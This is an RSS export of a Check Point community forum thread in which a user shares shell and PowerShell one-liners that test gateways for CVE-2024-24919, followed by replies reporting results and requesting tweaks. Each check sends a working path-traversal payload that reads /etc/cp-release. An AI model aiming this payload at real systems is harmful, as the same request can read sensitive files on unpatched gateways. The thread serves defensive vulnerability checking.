<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: ONELINER - Check CVE-2024-24919 Vulnerability in General Topics</title>
    <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216104#M35876</link>
    <description>&lt;P&gt;Is there a oneliner we can run on the gateway itself and how does this work in VSX?&lt;/P&gt;</description>
    <pubDate>Sun, 02 Jun 2024 08:16:15 GMT</pubDate>
    <dc:creator>genisis__</dc:creator>
    <dc:date>2024-06-02T08:16:15Z</dc:date>
    <item>
      <title>ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/215938#M35788</link>
      <description>&lt;P&gt;Run this onliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (&lt;A href="https://support.checkpoint.com/results/sk/sk182336" target="_self"&gt;sk182336&lt;/A&gt;).&lt;BR /&gt;GAIA gateways and SMB gateways are supported.&lt;/P&gt;
&lt;P&gt;1)&amp;nbsp; Depending on where you want to run the Onliner, you can copy and paste the code for GAIA, Linux or Powershell. &lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Copy the code into the CLI.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;1a) &lt;STRONG&gt;GAIA version&lt;/STRONG&gt; for expert mode:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;LI-CODE lang="javascript"&gt;clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;1b) &lt;STRONG&gt;Linux version&lt;/STRONG&gt; (all other linux distributions):&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;LI-CODE lang="javascript"&gt;clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;1c) &lt;STRONG&gt;Windows Powershell version&lt;/STRONG&gt;:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;LI-CODE lang="javascript"&gt;clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} };  if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point")  {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;2) Now enter the IP address of the gateway to be checked.&lt;BR /&gt;&lt;BR /&gt;GAIA/Linux:&lt;BR /&gt;&lt;span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="cve_33_5345345.jpg" style="width: 653px;"&gt;&lt;img src="https://community.checkpoint.com/t5/image/serverpage/image-id/26013i7B0A9ED023CA09F5/image-dimensions/653x283?v=v2" width="653" height="283" role="button" title="cve_33_5345345.jpg" alt="cve_33_5345345.jpg" /&gt;&lt;/span&gt;&lt;BR /&gt;&lt;BR /&gt;Powershell:&lt;BR /&gt;&lt;span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="PS_TT_5345345345.jpg" style="width: 654px;"&gt;&lt;img src="https://community.checkpoint.com/t5/image/serverpage/image-id/26028iB7A15F857D03122E/image-dimensions/654x461?v=v2" width="654" height="461" role="button" title="PS_TT_5345345345.jpg" alt="PS_TT_5345345345.jpg" /&gt;&lt;/span&gt;&lt;BR /&gt;&lt;BR /&gt;If the following message appears, your system &lt;STRONG&gt;is vulnerable&lt;/STRONG&gt;:&lt;FONT color="#FF0000"&gt;&lt;BR /&gt;&lt;BR /&gt;Attention! &lt;BR /&gt;The system is vulnerable to CVE-2024-24919. &lt;BR /&gt;More read here sk182336.&lt;/FONT&gt;&lt;/P&gt;
&lt;P&gt;&lt;FONT color="#000000"&gt;If the following message appears, your system is &lt;/FONT&gt;&lt;STRONG&gt;not vulnerable&lt;/STRONG&gt;&lt;FONT color="#000000"&gt;:&lt;/FONT&gt;&lt;/P&gt;
&lt;P&gt;&lt;FONT color="#99CC00"&gt;No vulnerability could be detected!&lt;/FONT&gt;&lt;/P&gt;
&lt;P&gt;If no output appears, the system is &lt;STRONG&gt;not&lt;/STRONG&gt; be &lt;STRONG&gt;reachable&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P&gt;---&lt;BR /&gt;&lt;BR /&gt;Version:&lt;BR /&gt;1.5&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 06/02/2024&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Powershell interactive version with windows&lt;BR /&gt;1.4&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 06/01/2024&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Powershell version with correct status codes&lt;BR /&gt;1.3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 06/01/2024&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Linux and Powershell version provided&lt;BR /&gt;1.2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 05/30/2024&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; error with SMB applications fixed&lt;BR /&gt;1.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 05/29/2024&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; fixed error with output&lt;BR /&gt;1.0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 05/28/2024 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; first version &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Sun, 02 Jun 2024 20:34:36 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/215938#M35788</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-02T20:34:36Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/215955#M35803</link>
      <description>&lt;P&gt;Very helpful tool.&lt;BR /&gt;We have checked about 40 gateways and found a few without a hotfix in our company.&lt;BR /&gt;&lt;BR /&gt;Thanks &lt;a href="https://community.checkpoint.com/t5/user/viewprofilepage/user-id/21670"&gt;@HeikoAnkenbrand&lt;/a&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Fri, 31 May 2024 16:47:31 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/215955#M35803</guid>
      <dc:creator>natascha</dc:creator>
      <dc:date>2024-05-31T16:47:31Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/215958#M35806</link>
      <description>&lt;P&gt;Nice&lt;/P&gt;</description>
      <pubDate>Fri, 31 May 2024 16:55:04 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/215958#M35806</guid>
      <dc:creator>renzi</dc:creator>
      <dc:date>2024-05-31T16:55:04Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216001#M35828</link>
      <description>&lt;P&gt;Fantastic as always!&lt;/P&gt;</description>
      <pubDate>Fri, 31 May 2024 23:31:30 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216001#M35828</guid>
      <dc:creator>the_rock</dc:creator>
      <dc:date>2024-05-31T23:31:30Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216024#M35837</link>
      <description>&lt;P&gt;Hi,&lt;/P&gt;&lt;P&gt;Can you modify script to check only for HTTP Response code after "| sed", because i think every gateway that respond with response code that is not 404 - File Not Found is vulnerable? This way this check can be used for small boxes, not managed by management server.&lt;/P&gt;</description>
      <pubDate>Sat, 01 Jun 2024 07:39:08 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216024#M35837</guid>
      <dc:creator>dceko</dc:creator>
      <dc:date>2024-06-01T07:39:08Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216032#M35842</link>
      <description>&lt;P&gt;Here you can read the latest information from Check Point:&lt;BR /&gt;&lt;BR /&gt;&lt;A href="https://support.checkpoint.com/results/sk/sk182336" target="_self"&gt;- Preventative Hotfix for CVE-2024-24919 - Quantum Gateway Information Disclosure&lt;/A&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;A href="https://community.checkpoint.com/t5/General-Topics/Important-security-update-stay-protected-against-VPN-Information/m-p/216013#M35830" target="_self"&gt;- Important security update - stay protected against VPN Information Disclosure (CVE-2024-24919) &lt;/A&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 04 Jun 2024 13:54:08 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216032#M35842</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-04T13:54:08Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216044#M35849</link>
      <description>&lt;P&gt;I just ran it on my Azure fw and it did not display anything...weird, though I do have vpn enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so its possible this is not even related to original issue with local vpn users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.&lt;/P&gt;
&lt;P&gt;Andy&lt;/P&gt;
&lt;P&gt;CVE-2024-24919 check tool by Heiko Ankenbrand 2024&lt;/P&gt;
&lt;P&gt;&lt;BR /&gt;Destination IP: 52.229.98.249&lt;BR /&gt;[Expert@azurefw:0]#&lt;/P&gt;</description>
      <pubDate>Sat, 01 Jun 2024 13:24:30 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216044#M35849</guid>
      <dc:creator>the_rock</dc:creator>
      <dc:date>2024-06-01T13:24:30Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216063#M35851</link>
      <description>&lt;P&gt;I have adapted the code so that it should now also work with SMB applications.&lt;/P&gt;</description>
      <pubDate>Sat, 01 Jun 2024 14:21:43 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216063#M35851</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-01T14:21:43Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216073#M35856</link>
      <description>&lt;P&gt;When running it on my gateway expert mode i get this:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;Destination IP: 10.10.11.11
&amp;lt;!DOCTYPE html&amp;gt;&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;
&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&amp;gt;&amp;lt;meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"&amp;gt;&amp;lt;meta name="others" content="WEBUI LOGIN PAGE"  /&amp;gt;&amp;lt;TITLE&amp;gt;GAiA&amp;lt;/TITLE&amp;gt;
&amp;lt;link rel="shortcut icon" href="/login/fav.ico"&amp;gt;
&amp;lt;link rel="stylesheet" type="text/css" href="/login/ext-all.css" /&amp;gt;
&amp;lt;link rel="stylesheet" type="text/css" href="/login/login.css" /&amp;gt;
&amp;lt;STYLE TYPE="text/css"&amp;gt;
.ext-ie .webui-login-fld{font-size: 11px;}
&amp;lt;/STYLE&amp;gt;
&amp;lt;script type="text/javascript" src="/login/ext-base.js"&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script type="text/javascript" src="/login/ext-all.js"&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script type="text/javascript"&amp;gt;var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";&amp;lt;/script&amp;gt;&amp;lt;script type="text/javascript" src="/login/login.js"&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;/HEAD&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;noscript&amp;gt;&amp;lt;div style='font-size:20px;position:relative;top:100px;'&amp;gt;For full functionality of this site it is necessary to enable JavaScript.&amp;lt;/div&amp;gt;&amp;lt;/noscript&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Sat, 01 Jun 2024 17:59:43 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216073#M35856</guid>
      <dc:creator>Moudar</dc:creator>
      <dc:date>2024-06-01T17:59:43Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216077#M35859</link>
      <description>&lt;P&gt;R81.20?&lt;/P&gt;</description>
      <pubDate>Sat, 01 Jun 2024 18:09:03 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216077#M35859</guid>
      <dc:creator>the_rock</dc:creator>
      <dc:date>2024-06-01T18:09:03Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216089#M35870</link>
      <description>&lt;P&gt;Hi &lt;a href="https://community.checkpoint.com/t5/user/viewprofilepage/user-id/65882"&gt;@Moudar&lt;/a&gt;&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;This is the HTML code of the gateway login screen.&lt;BR /&gt;I have modified the onliner so that this will no longer be shown in the future.&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;</description>
      <pubDate>Sat, 01 Jun 2024 19:38:40 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216089#M35870</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-01T19:38:40Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216104#M35876</link>
      <description>&lt;P&gt;Is there a oneliner we can run on the gateway itself and how does this work in VSX?&lt;/P&gt;</description>
      <pubDate>Sun, 02 Jun 2024 08:16:15 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216104#M35876</guid>
      <dc:creator>genisis__</dc:creator>
      <dc:date>2024-06-02T08:16:15Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216122#M35880</link>
      <description>&lt;P&gt;I think that should work in VS0.&lt;/P&gt;</description>
      <pubDate>Sun, 02 Jun 2024 19:22:05 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216122#M35880</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-02T19:22:05Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216124#M35881</link>
      <description>&lt;P&gt;Version 1.5 works as an interactive version with windows:&lt;BR /&gt;&lt;span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="PS_TT_5345345345.jpg" style="width: 627px;"&gt;&lt;img src="https://community.checkpoint.com/t5/image/serverpage/image-id/26027i4987DC91C1C95450/image-dimensions/627x442?v=v2" width="627" height="442" role="button" title="PS_TT_5345345345.jpg" alt="PS_TT_5345345345.jpg" /&gt;&lt;/span&gt;&lt;/P&gt;</description>
      <pubDate>Sun, 02 Jun 2024 19:31:14 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216124#M35881</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-02T19:31:14Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216131#M35882</link>
      <description>&lt;P&gt;thanks Heiko&lt;/P&gt;</description>
      <pubDate>Sun, 02 Jun 2024 20:18:10 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216131#M35882</guid>
      <dc:creator>genisis__</dc:creator>
      <dc:date>2024-06-02T20:18:10Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216277#M35930</link>
      <description>&lt;P&gt;Hi Heiko,&lt;/P&gt;&lt;P&gt;Thanks for this script, it is really a shame that Checkpoint did not provide this themselves or at least refer to this article in the mitigation guide.&lt;/P&gt;&lt;P&gt;Looks like the problem has been around for a long time and its strange that this has never been seen in a CODE review.&lt;BR /&gt;Usually you trust a firewall not to have such rookie bugs.&lt;/P&gt;&lt;P&gt;&lt;BR /&gt;Markus&lt;/P&gt;</description>
      <pubDate>Mon, 03 Jun 2024 18:48:30 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216277#M35930</guid>
      <dc:creator>EitschStwoN</dc:creator>
      <dc:date>2024-06-03T18:48:30Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216429#M35983</link>
      <description>&lt;P&gt;&lt;span class="lia-unicode-emoji" title=":thumbs_up:"&gt;👍&lt;/span&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 04 Jun 2024 19:25:36 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216429#M35983</guid>
      <dc:creator>GHOST</dc:creator>
      <dc:date>2024-06-04T19:25:36Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216430#M35984</link>
      <description>&lt;P&gt;AWESOME!&lt;/P&gt;</description>
      <pubDate>Tue, 04 Jun 2024 19:27:15 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/216430#M35984</guid>
      <dc:creator>the_rock</dc:creator>
      <dc:date>2024-06-04T19:27:15Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/217017#M36151</link>
      <description>&lt;P&gt;&lt;a href="https://community.checkpoint.com/t5/user/viewprofilepage/user-id/112568"&gt;@EitschStwoN&lt;/a&gt;&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;I think they don't want to publish the exploit code in the forum.&lt;BR /&gt;And from my point of view, that's a good thing.&lt;/P&gt;</description>
      <pubDate>Mon, 10 Jun 2024 14:17:25 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/217017#M36151</guid>
      <dc:creator>HeikoAnkenbrand</dc:creator>
      <dc:date>2024-06-10T14:17:25Z</dc:date>
    </item>
    <item>
      <title>Re: ONELINER - Check CVE-2024-24919 Vulnerability</title>
      <link>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/217019#M36153</link>
      <description>&lt;P&gt;Totally agree.&lt;/P&gt;</description>
      <pubDate>Mon, 10 Jun 2024 14:19:05 GMT</pubDate>
      <guid>https://community.checkpoint.com/t5/General-Topics/ONELINER-Check-CVE-2024-24919-Vulnerability/m-p/217019#M36153</guid>
